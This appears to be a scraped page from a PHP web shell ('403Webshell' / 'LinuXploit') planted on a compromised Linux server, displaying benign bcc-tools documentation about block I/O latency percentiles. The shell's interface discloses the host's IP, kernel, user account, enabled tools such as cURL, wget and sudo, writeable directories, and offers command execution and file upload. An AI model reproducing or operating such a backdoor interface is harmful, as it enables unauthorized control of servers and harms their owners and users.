403Webshell
Server IP : 160.187.147.141  /  Your IP : 216.73.216.229
Web Server : nginx/1.28.0
System : Linux inter3 6.8.0-63-generic #66-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:25:30 UTC 2025 x86_64
User : butparkerkhactencom ( 1005)
PHP Version : 8.4.8
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/doc/bpfcc-tools/examples/tracing/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/doc/bpfcc-tools/examples/tracing/biolatpcts_example.txt
Demonstrations of biolatpcts.py, the Linux eBPF/bcc version.


This traces block I/O and uses layered percpu arrays to bucket the completion
latencies. Latency percentiles are calculated periodically from the buckets.

# ./biolatpcts.py
p50=595.0us p75=685.0us p90=1500.0us p99=2500.0us
p50=55.0us p75=95.0us p90=305.0us p99=2500.0us
p50=385.0us p75=655.0us p90=1500.0us p99=2500.0us
[...]

The latency is measured from I/O request to the device, to the device
completion. This excludes latency spent queued in the OS.

This is a simplified example to demonstrate the calculation of latency
percentiles. See tools/biolatpcts.py for the full utility.

Youez - 2016 - github.com/yon3zu
LinuXploit